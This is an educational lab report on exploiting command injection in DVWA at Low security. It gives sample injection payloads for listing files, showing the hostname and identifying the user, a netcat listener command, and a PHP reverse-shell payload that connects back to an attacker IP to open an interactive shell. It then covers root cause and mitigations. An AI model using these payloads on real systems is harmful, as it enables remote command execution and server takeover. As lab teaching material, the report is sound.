COMMAND INJECTION VULNERABILITY ASSESSMENT REPORT

Target Application: DVWA (Damn Vulnerable Web Application)
Vulnerability Type: Command Injection
Security Level: Low
Severity: Critical
Testing Environment: Educational Lab

INTRODUCTION

This report documents the exploitation of a Command Injection vulnerability in DVWA at the Low security level.

Command Injection occurs when user-supplied input is passed directly to the operating system shell without proper sanitization or validation. This allows attackers to execute arbitrary system commands on the target server.

The assessment demonstrates how insecure handling of user input can lead to full system compromise.

OBJECTIVE

The objective of this assessment was to:

Identify command injection vulnerabilities
Execute arbitrary system commands
Analyze server-side command execution behavior
Demonstrate the risks associated with unsanitized input
TOOLS USED
Web Browser
DVWA
Netcat
Linux Shell Commands
VULNERABILITY DESCRIPTION

The DVWA Command Injection module at the Low security level does not properly sanitize user input before passing it to the operating system shell.

Because of this, attackers can append additional commands using shell operators such as:

;
&&
|
||

This allows arbitrary command execution on the target server.

EXPLOITATION PROCESS

Step 1: Access the Command Injection Module

The DVWA Command Injection page was opened from the vulnerabilities menu.

The application provides an input field intended for IP addresses used in a ping command.

Step 2: Test Normal Functionality

A valid IP address was entered:

127.0.0.1

The application successfully returned ping results, confirming that user input was being processed by a system command.

COMMAND INJECTION EXPLOITATION

At the Low security level, the application does not filter or validate special shell characters.

Additional system commands were appended to the input using shell separators.

TEST PAYLOADS

Payload 1:

127.0.0.1; ls

Purpose:
List files and directories on the server.

Payload 2:

127.0.0.1 && hostname

Purpose:
Display the system hostname.

Payload 3:

127.0.0.1 | whoami

Purpose:
Identify the current system user running the web application.

OBSERVED RESULTS

The injected commands were successfully executed by the server operating system.

The output of the commands was returned directly in the browser response.

This confirmed that the application was vulnerable to command injection.

REVERSE SHELL DEMONSTRATION

A reverse shell was tested to demonstrate the potential severity of the vulnerability.

Step 1: Start Netcat Listener

The following command was executed on the attack machine:

nc -nlvp 4242

This opened a listener waiting for incoming shell connections.

Step 2: Submit Reverse Shell Payload

Payload Used:

127.0.0.1;php -r '$sock=fsockopen("192.168.77.54",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

Note:
The IP address must be replaced with the attack machine's IP address.

RESULT

The server initiated a reverse connection to the attack machine.

An interactive shell session was obtained successfully.

This demonstrated that arbitrary remote command execution was possible through the vulnerable application.

ROOT CAUSE

The vulnerability exists because user input is directly passed to the operating system shell without:

Input sanitization
Command filtering
Character escaping
Validation controls

The application trusts user-supplied data and executes it as part of a system command.

SECURITY IMPACT

An attacker exploiting this vulnerability may be able to:

Execute arbitrary system commands
Access sensitive files
Gain remote shell access
Escalate privileges
Compromise the underlying server
Move laterally within the network

Because command execution occurs on the server itself, the impact is considered Critical.

RECOMMENDATIONS

The following mitigations are recommended:

Validate User Input
Only allow expected characters and formats.
Avoid Direct Shell Execution
Do not pass user input directly into system commands.
Use Secure APIs
Use safe programming functions instead of shell execution functions.
Implement Input Sanitization
Remove dangerous shell metacharacters.
Apply Principle of Least Privilege
Run web services with minimal system permissions.
Disable Dangerous Functions
Restrict functions such as:
system()
exec()
shell_exec()
passthru()
Monitor System Activity
Log and monitor suspicious command execution attempts.
CONCLUSION

The assessment confirmed that the DVWA application at the Low security level is critically vulnerable to Command Injection attacks.

Because the application directly passes unsanitized input to the operating system shell, attackers can execute arbitrary commands and potentially gain full control of the target server.
